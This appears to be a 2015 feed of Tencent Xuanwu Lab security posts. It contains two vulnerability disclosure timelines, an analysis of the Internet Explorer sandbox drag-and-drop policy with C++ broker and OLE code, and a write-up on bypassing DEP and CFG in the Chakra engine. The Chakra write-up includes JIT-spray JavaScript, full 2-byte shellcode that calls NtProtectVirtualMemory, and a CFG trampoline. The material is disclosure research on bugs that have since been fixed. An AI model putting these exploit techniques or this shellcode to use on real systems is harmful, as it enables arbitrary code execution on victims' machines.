2015/03/05 provide vulnerability detail to Microsoft Security Response Center via secure@microsoft.com
2015/04/01 Microsoft Security Response Center automatic reply
2015/06/09 Microsoft Security Response Center assigned CVE-ID CVE-2015-1752

This vulnerability was discovered by:   exp-sky

Flash Player Memory Corruption in Display List Handling http://xlab.tencent.com/en/2015/12/29/xlab-15-024/ Tue, 29 Dec 2015 09:56:34 +0000 http://xlab.tencent.com/en/?p=48

XLAB ID: XLAB-15-024

CVE ID: CVE-2015-8459     

Patch Status: Fixed

Vulnerability Details:
The specific flaw exists within the handling of the display list. By manipulating a DisplayObject’s properties, an attacker can force memory corruption to occur in Flash Player. An attacker can leverage this vulnerability to execute code under the context of the current process.

Disclosure Timeline:

2015/07/13 Provide vulnerability detail to Adobe via psirt@adobe.com
2015/07/16 Adobe responded that they had opened case PSIRT-3929 for the issue
2015/12/28 Adobe responded that they had assigned CVE-2015-8459 to the issue

This vulnerability was discovered by:   kai kang

Drag & Drop Security Policy of IE Sandbox http://xlab.tencent.com/en/2015/12/18/drag-drop-security-policy-of-ie-sandbox/ Fri, 18 Dec 2015 11:03:51 +0000 http://xlab.tencent.com/en/?p=82

One class of vulnerability abuses flaws in applications whitelisted in the ElevationPolicy settings to bypass the sandbox. A DragDrop policy setting in the IE registry, similar to ElevationPolicy, caught our attention. In this post, the writer takes the attacker’s perspective and tries every possible means to break out of the IE sandbox, analyzing each obstacle along the way in order to detail the drag and drop security policy of the IE sandbox.

0x01 DragDrop Policy of IE sandbox

Among all IE sandbox bypass techniques, there is one that abuses whitelisted applications in ElevationPolicy to execute arbitrary code. In the registry, there is a configuration called DragDrop that is similar to ElevationPolicy. The specific registry path is:

HKLM\Software\Microsoft\Internet Explorer\Low Rights\DragDrop

As shown in the figure:

Here are the meanings for values of the DragDrop policy:

0: If the target window is not a valid DropTarget, reject;

1: The target window is a valid DropTarget, but contents cannot be copied;

2: Use a popup to ask for the user’s permission. If allowed, copy contents to the target window;

3: Allow silent drag and drop.
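
As a compact restatement of the four values, the following Python sketch maps them to an outcome. The enum member names and the may_copy helper are invented for illustration and do not correspond to identifiers in IE.

```python
from enum import IntEnum


class DragDropPolicy(IntEnum):
    REJECT = 0        # reject when the target is not a valid DropTarget
    NO_COPY = 1       # valid DropTarget, but contents cannot be copied
    PROMPT_USER = 2   # ask the user, copy only if allowed
    SILENT = 3        # allow silent drag and drop


def may_copy(policy, user_allows=False):
    """Return True when contents would be copied to the target window."""
    if policy == DragDropPolicy.SILENT:
        return True
    if policy == DragDropPolicy.PROMPT_USER:
        return user_allows
    return False


for value in range(4):
    print(DragDropPolicy(value).name, may_copy(DragDropPolicy(value)))
```

Only a value of 3 copies without any user involvement, which is why entries with that value are the interesting ones for an attacker.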

In a clean Windows 8.1 installation, there are 3 applications under the DragDrop key by default: iexplore.exe, explorer.exe, and notepad.exe. The policy value for each is 3. When the policy value of the target application is 2 and a file is dragged to the target window, IE pops up a prompt like this:

0x02 DragDrop Issue for the Explorer process

When files are dragged from IE to Explorer, IE does not pop up anything because the DragDrop policy value is 3, but the Explorer process pops up a prompt like this:

However, when we drag files from IE to the folder tree in Explorer’s sidebar, no prompt pops up. This may be an imperfection in the implementation of Explorer. On second thought, if we can simulate the mouse operations of drag and drop inside the IE sandbox, we will be able to use this Explorer issue to cross the security boundary of the IE sandbox.

0x03 Finish OLE Drag Drop without the Mouse

OLE dragdrop is a generic file dragging method. It uses the design for OLE interface to implement the drag and drop operations, making it generic and modular. The OLE dragdrop technique includes three basic interfaces:

  • IDropSource Interface: represents the source object where the dragdrop operation is issued, implemented by source object;

  • IDropTarget Interface: represents the target object on which the dragdrop operation is taken, implemented by target object;

  • IDataObject Interface: represents the data transferred during the dragdrop operation, implemented by source object;

This figure describes the key components required by a complete OLE dragdrop operation:

To simulate the drag and drop operations of a mouse, all we need is to implement the IDropSource interface and the IDataObject interface. The core of a normal OLE dragdrop operation is a call to the ole32!DoDragDrop function; here is the function prototype:

HRESULT DoDragDrop(
   IDataObject *pDataObject,   // Pointer to the data object
   IDropSource *pDropSource,   // Pointer to the source
   DWORD       dwOKEffect,     // Effects allowed by the source
   DWORD       *pdwEffect      // Pointer to effects on the source
);

Information about the source object and the data of the dragdrop operation is passed in the parameters of DoDragDrop. Inside DoDragDrop, the position of the mouse pointer is used to obtain information about the target object. In the following, the writer gives a method that uses code instead of the mouse to perform the dragdrop operation.

To simulate a mouse dragdrop operation in code, we isolate the GUI part of DoDragDrop, find the function that actually performs the dragdrop operation, and pass it the required parameters. I’ll illustrate the internal implementation of DragDrop using ole32.dll 6.1.7601.18915 from Win7.

Here is the main logic of Ole32!DoDragDrop:

HRESULT __stdcall DoDragDrop(LPDATAOBJECT pDataObj, LPDROPSOURCE pDropSource, DWORD dwOKEffects, LPDWORD pdwEffect)
{
    HRESULT hr;

    CDragOperation::CDragOperation(drgop, pDataObj, pDropSource, dwOKEffects, pdwEffect, hr);
    if ( hr >= 0 ){
      // Loop until the drag ends, then complete the drop
      while ( CDragOperation::UpdateTarget(drgop) &&
        CDragOperation::HandleMessages(drgop) )
        ;
      hr = CDragOperation::CompleteDrop(drgop);
    }

    return hr;
}

CDragOperation::CDragOperation is the constructor. Its important initialization operations include:


The while loop that follows tracks the dragdrop status. Finally, CompleteDrop completes the operation; the key function call is like this:


As can be seen, it is the ole32!PrivDragDrop function that finally performs the dragdrop operation. Since PrivDragDrop is an internal function of ole32.dll, we call it through a hardcoded offset of the function address. We define a DropData function to simulate the mouse dragdrop operation; its input parameters are the target window handle and the IDataObject pointer of the file being dragged. The main logic is as follows:

auto DropData(HWND hwndDropTarget, IDataObject* pDataObject)
{
    void *DOBuffer = nullptr;
    HRESULT result = GetMarshalledInterfaceBuffer(IID_IDataObject, pDataObject, DOBuffer);

    if (SUCCEEDED(result)){
        DWORD dwEffect = 0;
        POINTL ptl = { 0, 0 };
        void *hDDInfo = nullptr;
        // Assign to the outer result (no redeclaration) so the returned value reflects the last call
        result = PrivDragDrop(hwndDropTarget, DRAGOP_ENTER, DOBuffer, pDataObject, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
        if (SUCCEEDED(result)){
            result = PrivDragDrop(hwndDropTarget, DRAGOP_OVER, 0, 0, MK_LBUTTON, ptl, dwEffect, 0, hDDInfo);
            if (SUCCEEDED(result)){
                HWND hClip = GetPrivateClipboardWindow(CLIP_QUERY);
                result = PrivDragDrop(hwndDropTarget, DRAGOP_DROP, DOBuffer, pDataObject, 0, ptl, dwEffect, hClip, hDDInfo);
            }
        }
    }
    return result;
}

The target window handle can be obtained through the FindWindow function. There are two methods to pack a DataObject and get the pointer of its IDataObject interface:

  • Write your own C++ class to implement the IDataObject interface;

  • Use the existing implementation in the class library, for instance, both MFC and Shell32 provide related class to implement the DragDrop interface.

The following shows how to use the MFC class library to pack a DataObject and get the pointer of its IDataObject interface. Here is the implementation code:

auto GetIDataObjectForFile(CString filePath)
{
    COleDataSource* pDataSource = new COleDataSource();
    IDataObject*    pDataObject;
    UINT            uBuffSize = 0;
    HGLOBAL         hgDrop;
    DROPFILES*      pDrop;
    TCHAR*          pszBuff;
    FORMATETC       fmtetc = { CF_HDROP, NULL, DVASPECT_CONTENT, -1, TYMED_HGLOBAL };

    // DROPFILES header, the path, and the double null terminator of the file list.
    uBuffSize = sizeof(DROPFILES) + sizeof(TCHAR) * (lstrlen(filePath) + 2);
    hgDrop = GlobalAlloc(GHND | GMEM_SHARE, uBuffSize);
    if (hgDrop != nullptr){
        pDrop = (DROPFILES*)GlobalLock(hgDrop);
        if (pDrop != nullptr){
            pDrop->pFiles = sizeof(DROPFILES);
#ifdef _UNICODE
            pDrop->fWide = TRUE;
#endif
            pszBuff = (TCHAR*)(LPBYTE(pDrop) + sizeof(DROPFILES));
            lstrcpy(pszBuff, (LPCTSTR)filePath);
            GlobalUnlock(hgDrop);
            pDataSource->CacheGlobalData(CF_HDROP, hgDrop, &fmtetc);
            pDataObject = (IDataObject *)pDataSource->GetInterface(&IID_IDataObject);
        } else {
            pDataObject = nullptr;
        }
    } else {
        pDataObject = nullptr;
    }
    return pDataObject;
}

0x04 Drag Drop Implementation of IE Sandbox

When we use the mouse to perform a dragdrop operation in the IE sandbox, the IE tab process in the sandbox transfers the data to the main process outside the sandbox through ShdocvwBroker. That is to say, the actual dragdrop operation is completed in the IE main process outside the sandbox. The function calls in the two processes look roughly like the following:

IE sub process (inside the sandbox):

    -- … send ALPC message to IE main process

IE main process:

… receive the ALPC message from IE sub process

0x05 Security Limits that IE Sandbox Applies to the Drag Drop Operation

Inside the IE sandbox, we can directly call the functions exposed by the Broker. By creating an IEUserBroker and using it to create a ShdocvwBroker, we are able to call the IEFRAME!CShdocvwBroker::PerformDoDragDrop function in the main process. The calling method looks like the following:

typedef HRESULT(__stdcall *FuncCoCreateUserBroker)(IIEUserBroker **ppBroker);

IIEUserBrokerPtr CreateIEUserBroker()
{
    HMODULE hMod = LoadLibraryW(L"iertutil.dll");
    // CoCreateUserBroker is exported by ordinal only (58).
    FuncCoCreateUserBroker CoCreateUserBroker = (FuncCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
    if (CoCreateUserBroker)
    {
        IIEUserBrokerPtr broker;
        HRESULT ret = CoCreateUserBroker(&broker);
        return broker;
    }
    return nullptr;
}

IIEUserBrokerPtr broker = CreateIEUserBroker();
IShdocvwBroker* shdocvw;
broker->BrokerCreateKnownObject(clsid_CIERecoveryStore, __uuidof(IRecoveryStore), (IUnknown**)&shdocvw);
shdocvw->PerformDoDragDrop(HWND__ *,IEDataObjectWrapper *,IEDropSourceWrapper *,ulong,ulong,ulong *,long *);

The dragdrop operation is eventually performed by calling the ole32!DoDragDrop function, and all the parameters that DoDragDrop requires can be passed through the PerformDoDragDrop function (refer to the parameter information of the DoDragDrop function mentioned in chapter 0x03). At this point, we can already reach the ole32!DoDragDrop function outside the sandbox from inside it and pass controllable parameters. However, there are two ways to simulate the dragdrop operation of a mouse:

  • Use the method mentioned in chapter 0x02 to directly call the internal function in ole32.dll;

  • Call API to change the position of the mouse.

For the first method, since we are in the sandbox, we can only leave the sandbox and enter the process space of the IE main process through the proxy of the Broker interface. We therefore cannot call the internal functions of a DLL in the main process, so this method is not feasible.

For the second method, if we could change the position of the mouse, then the ole32!DoDragDrop function would use the mouse position to obtain information about the target window. However, during our experiments we noticed that it is not possible to change the mouse position through an API from inside the sandbox. The following illustrates this problem.

We can think of two ways to change the mouse position:

1. Simulate mouse movements through the SendInput function. The following shows the call chain of the SendInput function from user mode to kernel mode:


2. Change the mouse position through the SetCursorPos function. The following shows the call chain of the SetCursorPos function from user mode to kernel mode:


First, SendInput: calling the SendInput function directly in the IE sandbox returns error 0x5 (access denied), because SendInput is hooked in IEShims.dll and the call is handled by the hook function. The specific location of that handling is:

This hook is easy to bypass by calling NtUserSendInput directly. That function is not exported, so its address has to be hardcoded as a function offset. Calling NtUserSendInput directly returns no error, but the position of the mouse does not change. The call fails silently because of the limits imposed by UIPI (User Interface Privilege Isolation). The same happens when calling the SetCursorPos function.

UIPI is a security feature introduced in Windows Vista. It is implemented in the Windows kernel, and the specific location is as follows:


In Win8.1, this is the logic of the function:

signed int __stdcall CheckAccessForIntegrityLevelEx(
            unsigned int CurrentProcessIntegrityLevel, 
            int          CurrentIsAppContainer, 
            unsigned int TargetProcessIntegrityLevel, 
            int          TargetIsAppContainer)
{
    signed int result;
    // Source has a lower integrity level than the target: reject.
    if ( gbEnforceUIPI && CurrentProcessIntegrityLevel < TargetProcessIntegrityLevel )
        result = 0;
    // Equal integrity levels: decide on the AppContainer properties.
    else if ( gbEnforceUIPI && CurrentProcessIntegrityLevel == TargetProcessIntegrityLevel )
        result = (CurrentIsAppContainer == TargetIsAppContainer || 
                  TargetIsAppContainer == -1 || 
                  CurrentIsAppContainer == -1) || 
                  SeIsParentOfChildAppContainer(...);
    // Source has a higher integrity level, or UIPI is not enforced: permit.
    else
        result = 1;
    return result;
}

This function first compares the integrity levels of the source process and the target process. If the integrity level of the source process is lower than that of the target process, the request is rejected; if it is higher, the request is permitted. If the two integrity levels are equal, the function then examines the AppContainer property: when the processes are running in AppContainers, it uses the SeIsParentOfChildAppContainer function to determine whether the two satisfy the restriction. If they do, the request is permitted; if not, it is rejected.

Note: parameters such as ProcessIntegrityLevel and IsAppContainer are extracted from the EPROCESS->Win32Process structure, which is an internal structure. SeIsParentOfChildAppContainer is an internal function in ntoskrnl.
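The decision logic described above can be modeled in a few lines of JavaScript. This is only a simplified sketch for reasoning about the outcomes, not the kernel implementation: the object shape, the `isParentOfChild` callback (standing in for SeIsParentOfChildAppContainer) and the function name are assumptions made for illustration.

```javascript
// Simplified model of the UIPI decision; all names here are hypothetical.
// isParentOfChild stands in for the kernel's SeIsParentOfChildAppContainer.
function checkAccessForIntegrityLevel(enforceUipi, cur, target, isParentOfChild) {
  if (!enforceUipi) return true;              // UIPI not enforced: permit
  if (cur.level < target.level) return false; // lower integrity source: reject
  if (cur.level > target.level) return true;  // higher integrity source: permit
  // Equal integrity: compare the AppContainer values (-1 is the special
  // value that the listing above treats as "permit").
  if (cur.appContainer === target.appContainer ||
      cur.appContainer === -1 || target.appContainer === -1) {
    return true;
  }
  return Boolean(isParentOfChild(cur, target));
}

// Mandatory integrity level RIDs for low and medium integrity.
const LOW = 0x1000;
const MEDIUM = 0x2000;

// A low integrity sandboxed tab sending input to a medium integrity window.
const sandboxToDesktop = checkAccessForIntegrityLevel(
  true,
  { level: LOW, appContainer: 0 },
  { level: MEDIUM, appContainer: 0 },
  () => false
);
```

Under this model `sandboxToDesktop` is `false`, which matches the observation that SendInput and SetCursorPos have no effect from inside the sandbox.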

0x06 Summary

This post details the security policy that the IE sandbox applies to dragdrop operations. It covers the restriction policy of the IE sandbox for dragdrop, the problems that the Explorer process has with dragdrop, the internal principle of how ole32.dll implements dragdrop, how IE implements the dragdrop operation in the sandbox, and where and how the security limits are enforced. The IE sandbox applies effective security limits to the dragdrop operation by hooking specific functions in IEShims.dll and by relying on the UIPI feature in Windows (Windows Vista and later).

0x07 Reference

  1. Understanding and Working in Protected Mode Internet Explorer

  2. OLE Drag and Drop

  3. How to Implement Drag and Drop between Your Program and Explorer


0x08 Acknowledgement

Thanks to Wins0n for helping me with ole32 reversing, and to FlowerCode for helping me with my thoughts and solving difficulties.

Translated by WooYun Drops.
Bypass DEP and CFG using JIT compiler in Chakra engine http://xlab.tencent.com/en/2015/12/09/bypass-dep-and-cfg-using-jit-compiler-in-chakra-engine/ Wed, 09 Dec 2015 05:19:41 +0000

JIT Spray is a popular exploitation technique that first appeared in 2010. It embeds shellcode as immediate values in the executable code that the JIT compiler generates. Currently, all major JIT engines, including Chakra, already have many mitigations in place against this technique, such as random NOP instruction insertion and constant blinding.

This article points out two weaknesses in Chakra’s JIT Spray mitigation (in Windows 8.1 and older operating systems, and Windows 10, respectively), allowing attackers to use JIT Spray to execute shellcode, bypassing DEP. I will also discuss a method to bypass CFG using Chakra’s JIT compiler.

0x01 Constant Blinding

Constant Blinding is the most important mitigation strategy against JIT Spray. The Chakra engine XORs every user-supplied immediate value that is not 0x0000 or 0xFFFF with a randomly generated key, and decrypts it on the fly. For example, the following JavaScript:

a ^= 0x90909090;
a ^= 0x90909090;
a ^= 0x90909090;

Generates machine code like this:

096b0091 ba555593c5      mov     edx,0C5935555h
096b0096 81f2c5c50355    xor     edx,5503C5C5h
096b009c 33fa            xor     edi,edx
096b009e bab045edfb      mov     edx,0FBED45B0h
096b00a3 81f220d57d6b    xor     edx,6B7DD520h
096b00a9 33fa            xor     edi,edx
096b00ab baef85f139      mov     edx,39F185EFh
096b00b0 81f27f1561a9    xor     edx,0A961157Fh
096b00b6 33fa            xor     edi,edx

The immediate value in the resulting machine code is unpredictable, thus shellcode embedding is not possible.
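The effect can be reproduced with plain XOR arithmetic. The sketch below is only a model of the idea (the `blind` and `unblind` helpers are hypothetical names, not Chakra functions); it also checks that each `mov`/`xor` pair from the listing above decodes back to the original constant.

```javascript
// Model of constant blinding: the JIT emits (value ^ key) and key as two
// separate immediates and XORs them at run time to recover the value.
function blind(value, key) {
  return { masked: (value ^ key) >>> 0, key: key >>> 0 };
}

function unblind(pair) {
  return (pair.masked ^ pair.key) >>> 0;
}

// Immediate pairs copied from the disassembly above (mov edx / xor edx).
const listingPairs = [
  { masked: 0xC5935555, key: 0x5503C5C5 },
  { masked: 0xFBED45B0, key: 0x6B7DD520 },
  { masked: 0x39F185EF, key: 0xA961157F },
];

const decoded = listingPairs.map(unblind);
```

Each entry of `decoded` is 0x90909090, while none of the bytes that actually appear in the code stream are attacker-chosen.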

0x02 Bypass Chakra’s Constant Blinding on Windows 8.1 or Older Operating Systems

Internally, the Chakra engine stores an integer n as n*2+1. When evaluating the expression n=n+m, it is not necessary to restore the original value of n before adding m; the result can be obtained by directly adding m*2 to n*2+1. The Chakra engine on Windows 8.1 and older operating systems treats m*2 as self-generated data rather than user input, so constant blinding does not apply. For the following JavaScript code:

a += 0x18EB9090/2;
a += 0x18EB9090/2;

When some conditions are met, the JIT compiler could generate machine code like this:

05010090 81c19090eb18    add     ecx,18EB9090h
05010096 0f80d6010000    jo      05010272
0501009c 8bf9            mov     edi,ecx
0501009e 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100a1 f6c301          test    bl,1
050100a4 0f8413020000    je      050102bd
050100aa 8bcb            mov     ecx,ebx
050100ac 81c19090eb18    add     ecx,18EB9090h
050100b2 0f8005020000    jo      050102bd
050100b8 8bf9            mov     edi,ecx
050100ba 8b5dbc          mov     ebx,dword ptr [ebp-44h]
050100bd f6c301          test    bl,1
050100c0 0f8442020000    je      05010308
050100c6 8bcb            mov     ecx,ebx
0:017> u 05010090 + 2 l 3
05010092 90              nop
05010093 90              nop
05010094 eb18            jmp     050100ae
0:017> u 050100ae l 3
050100ae 90              nop
050100af 90              nop
050100b0 eb18            jmp     050100ca

If we make each instruction in our shellcode no larger than 2 bytes, it can be embedded in the immediate value. The actual immediate value is twice the value written in JavaScript, so the first byte must be an even number when we use a 2-byte instruction, which is not very hard to satisfy.
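The arithmetic behind this can be checked with a small sketch. The helper names (`tag`, `untag`, `addImmediate`, `immediateBytes`) are made up for illustration and only model the n*2+1 representation described above.

```javascript
// Tagged integer representation: n is stored as n*2+1.
const tag = (n) => n * 2 + 1;
const untag = (t) => (t - 1) / 2;

// For `n += m` the engine can add m*2 straight to the tagged value.
const addImmediate = (m) => m * 2;

// Little-endian bytes of the 32-bit immediate that ends up in the code.
function immediateBytes(m) {
  const imm = addImmediate(m) >>> 0;
  return [imm & 0xff, (imm >>> 8) & 0xff, (imm >>> 16) & 0xff, imm >>> 24];
}

// The constant used in the JavaScript above.
const bytes = immediateBytes(0x18EB9090 / 2);
```

Here `bytes` is `[0x90, 0x90, 0xEB, 0x18]`, which is exactly the `nop; nop; jmp` sequence seen when disassembling at offset +2 of the `add` instruction. Because the immediate is always m*2, its lowest byte is necessarily even.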

0x5854   // push esp--pop eax    ; eax = esp, make eax writeable
0x5252   // push edx--push edx   ; esp -= 8
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0x5E52   // push edx--pop esi    ; esi = 0
0x40B6   // mov  dh, 0x40        ; edx = 0x4000, NumberOfBytesToProtect
0x5452   // push edx--push esp   ; *esp = &NumberOfBytesToProtect
0x5B90   // pop  ebx             ; ebx = &NumberOfBytesToProtect
0x14B6   // mov  dh, 0x14
0x14B2   // mov  dl, 0x14
0x5266   // push dx
0x5666   // push si              ; *esp = 0x14140000
0x525A   // pop  edx--push edx   ; edx = 0x14140000
0x5E54   // push esp--pop  esi   ; esi = &BaseAddress, 
0x5454   // push esp--push esp   ; push &OldAccessProtection 
0x406A   // push 0x40            ; PAGE_EXECUTE_READWRITE
0x5390   // push ebx             ; push  &NumberOfBytesToProtect
0x5690   // push esi             ; push &BaseAddress
0xFF6A   // push -1              ; 
0x5252   // push edx--push edx   ; set ret addr
0x5290   // push edx             ; prepare esp for fs:[esi]
0x016A   // push 1
0x4A5A   // pop  edx--dec edx    ; edx = 0
0xC0B2   // mov  dl, 0xC0
0x5E52   // push edx--pop esi
0x5F54   // push esp--pop edi
0xA564   // movs dword ptr [edi], dword ptr fs:[esi] ; *esp = *(fs:0xC0)
0x4FB2   // mov  dl, 0x4F        ; NtProtectVirtualMemory, Win8.1:0x4F, Win10:0x50
0x5290   // push edx
0xC358   // pop  eax--ret        ; ret to syscall
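As a rough sketch, each 16-bit word from the list can be turned into a JavaScript statement of the form used in section 0x02. It assumes that every immediate carries the two shellcode bytes followed by the `jmp +18h` (bytes EB 18) from the earlier listing; the jump distance depends on the generated code and is not guaranteed. The function name is hypothetical.

```javascript
// Assumption: immediate layout is [low byte, high byte, 0xEB, 0x18], i.e.
// the shellcode word followed by the short jump seen in the listing.
const JMP_NEXT = 0x18EB;

function statementFor(word) {
  if (word < 0 || word > 0xFFFF) throw new RangeError("expected a 16-bit word");
  // The immediate is twice the JavaScript constant, so it must be even.
  if (word & 1) throw new RangeError("low byte must be even");
  const imm = ((JMP_NEXT << 16) | word) >>> 0;
  return "a += 0x" + imm.toString(16).toUpperCase() + "/2;";
}

// First three words of the shellcode above.
const firstStatements = [0x5854, 0x5252, 0x016A].map(statementFor);
```

For example, `statementFor(0x9090)` yields `a += 0x18EB9090/2;`, the statement shown in section 0x02.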

0x03 Bypass Chakra’s Constant Blinding on Windows 10

The Chakra engine on Windows 10 does not suffer from this issue. However, in order to generate highly optimized code for writes to an integer array, the following JavaScript code:

var ar = new Uint16Array(0x10000);
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;
ar[0x9090/2] = 0x9090;

Generates the following machine code:

0b8110e0 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110e9 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110f2 66c786909000009090 mov   word ptr [esi+9090h],9090h
0b8110fb 66c786909000009090 mov   word ptr [esi+9090h],9090h

To mitigate JIT Spray, Chakra only allows the user to control at most 2 bytes of an immediate value. But in this specific situation, the array index and the value being written appear in one instruction, so we can control 4 bytes of data instead of 2.

The previously discussed 2-byte shellcode can also be used here. Due to the additional two 0x00 bytes (which will be interpreted as “add byte ptr [eax], al”), we need to make eax point to a writable location in the first two instructions.
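To see which bytes are under the script's control, the instruction can be assembled by hand. This sketch hardcodes the encoding visible in the listing above (operand size prefix 66, opcode C7, ModRM 86 for `[esi+disp32]`); the helper names are made up, and a real JIT may choose a different register or addressing form.

```javascript
// Encode `mov word ptr [esi+disp32], imm16` as it appears in the listing.
function encodeUint16Store(index, value) {
  const disp = (index * 2) >>> 0; // byte offset of the element in a Uint16Array
  return [
    0x66, 0xC7, 0x86,
    disp & 0xff, (disp >>> 8) & 0xff, (disp >>> 16) & 0xff, disp >>> 24,
    value & 0xff, (value >>> 8) & 0xff,
  ];
}

const toHex = (bytes) =>
  bytes.map((b) => b.toString(16).padStart(2, "0")).join("");

// ar[0x9090/2] = 0x9090
const encoded = toHex(encodeUint16Store(0x9090 / 2, 0x9090));
```

`encoded` is `66c786909000009090`, matching the listing: two controlled bytes from the index, two zero bytes, then two controlled bytes from the value.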

0x04 Using Chakra Engine to Bypass CFG

By using the previously discussed methods, we can perform a JIT Spray to bypass DEP, but the address of the shellcode entry point embedded in the JIT’d code obviously cannot pass the CFG check. However, there are implementation flaws in the Chakra engine itself that can be exploited to bypass CFG.

There is a fixed entry point function that always gets generated, regardless of whether the currently executing JavaScript code needs JIT compilation:

0:017> uf 4ff0000
04ff0000 55          push  ebp
04ff0001 8bec        mov   ebp,esp
04ff0003 8b4508      mov   eax,dword ptr [ebp+8]
04ff0006 8b4014      mov   eax,dword ptr [eax+14h]
04ff0009 8b4840      mov   ecx,dword ptr [eax+40h]
04ff000c 8d4508      lea   eax,[ebp+8]
04ff000f 50          push  eax
04ff0010 b840cb5a71  mov   eax, 715acb40h ; jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>
04ff0015 ffe1        jmp   ecx

The address of this function can pass the CFG check. Also, there is no CFG check of the target address before jmp ecx. It can therefore be used as a trampoline for jumping to an arbitrary address. We will call it “cfgJumper” hereafter.

0x05 Locating JIT Memory and cfgJumper

We need to locate both the JIT compiled code and the cfgJumper if we want to use JIT Spray to bypass DEP and use cfgJumper to bypass CFG. Interestingly, the methods of locating the two are almost identical.

Every JavaScript function has a corresponding Js::ScriptFunction object. Every Js::ScriptFunction object also includes a Js::FunctionBody object. Inside this Js::FunctionBody object, a function pointer to the actual function entry point is stored.

If a function is never called, this function pointer points to Js::InterpreterStackFrame::DelayDynamicInterpreterThunk:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@........... // Js::ScriptFunction
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 70181720 00000001 00000000  p..o ..p........ // Js::FunctionBody
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 70181720 l 1
70181720 55              push    ebp

If a function has been called before, but never compiled into JIT’d code, this function pointer points to cfgJumper:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 00860000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00860000
00860000 55          push  ebp
00860001 8bec        mov   ebp,esp
00860003 8b4508      mov   eax,dword ptr [ebp+8]
00860006 8b4014      mov   eax,dword ptr [eax+14h]
00860009 8b4840      mov   ecx,dword ptr [eax+40h]
0086000c 8d4508      lea   eax,[ebp+8]
0086000f 50          push  eax
00860010 b800240870  mov   eax,70082400h ; Chakra!Js::InterpreterStackFrame::InterpreterThunk
00860015 ffe1        jmp   ecx

If a function is regularly called and Chakra compiles it into JIT’d code, this function pointer points to the actual code:

0:002> d 0b89de70 l8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> d 0b8d0000 l8
0b8d0000  6ff6c970 00950000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00950000
00950000 55              push    ebp
00950001 8bec            mov     ebp,esp
00950003 81fc44c9120b    cmp     esp,0B12C944h
00950009 7f18            jg      00950023
0095000b 6a00            push    0
0095000d 6a00            push    0
0095000f 68e0c72c07      push    72CC7E0h
00950014 6844090000      push    944h

With an understanding of the internal structure of Js::ScriptFunction and Js::FunctionBody, we can precisely locate the JIT’d code and the cfgJumper.
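The pointer walk can be sketched as follows. The offsets 0x14 and 0x04 are read off the dumps above and should be treated as specific to that build; `read32` is a hypothetical memory read primitive that an exploit would have to supply, simulated here with a tiny map built from the first dump.

```javascript
// Offsets taken from the dumps above; assumed to be build specific.
const FUNCTION_BODY_OFFSET = 0x14; // Js::ScriptFunction -> Js::FunctionBody
const ENTRY_POINT_OFFSET = 0x04;   // Js::FunctionBody -> entry point pointer

// read32 is a hypothetical primitive that returns the dword at an address.
function entryPointOf(read32, scriptFunctionAddr) {
  const functionBody = read32(scriptFunctionAddr + FUNCTION_BODY_OFFSET);
  return read32(functionBody + ENTRY_POINT_OFFSET);
}

// Fake memory holding the two dwords that matter in the first dump.
const fakeMemory = new Map([
  [0x0b89de84, 0x0b8d0000], // ScriptFunction + 0x14
  [0x0b8d0004, 0x70181720], // FunctionBody + 0x04
]);
const fakeRead32 = (addr) => fakeMemory.get(addr);

const entryPoint = entryPointOf(fakeRead32, 0x0b89de70);
```

With the values of the first dump, `entryPoint` is 0x70181720, the address disassembled there. After the function has been called or JIT compiled, the same walk yields the cfgJumper or the JIT’d code instead.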

0x06 Avoiding Randomly Inserted NOP instructions

Besides constant blinding, the Chakra engine also employs randomized NOP instruction insertion to mitigate JIT Spray, but the density of the insertion is rather low. The test code combines 29 16-bit numbers to form the shellcode. On Windows 10 only 29 x86 instructions are generated, with virtually no NOP instructions inserted in between. With the exploitation method used on Windows 8.1 and older operating systems, however, about 200 x86 instructions are generated, and they are highly likely to contain NOP instructions.

To solve this problem:
1. Create a new script tag, put in a JavaScript function that contains JIT shellcode.
2. Call this function in a loop to trigger JIT compilation.
3. Read in compiled code to determine if there is any NOP instruction inserted.
4. If any, destroy the script tag and repeat this procedure.
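The procedure above amounts to a retry loop, sketched below. Both callbacks are hypothetical placeholders: `compileCandidate` stands for steps 1 and 2 (create the script tag and trigger JIT compilation) and `hasInsertedNop` for step 3; how they are implemented depends on the memory read primitive available and is not shown here.

```javascript
// Retry until a compilation without inserted NOPs is found.
// compileCandidate() must return { code, destroy }; both callbacks are
// hypothetical stand-ins for the steps listed above.
function sprayUntilClean(compileCandidate, hasInsertedNop, maxAttempts = 100) {
  for (let attempt = 1; attempt <= maxAttempts; attempt++) {
    const candidate = compileCandidate();   // steps 1 and 2
    if (!hasInsertedNop(candidate.code)) {  // step 3
      return { candidate, attempt };
    }
    candidate.destroy();                    // step 4, then try again
  }
  return null; // gave up after maxAttempts
}
```

The attempt limit is an addition for safety in the sketch; the procedure itself simply repeats until it succeeds.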

The testing environments are Windows 8.1 with all updates through May 2015 and Windows 10 TP 9926.
Microsoft informed me that the issues were fixed in September 2015.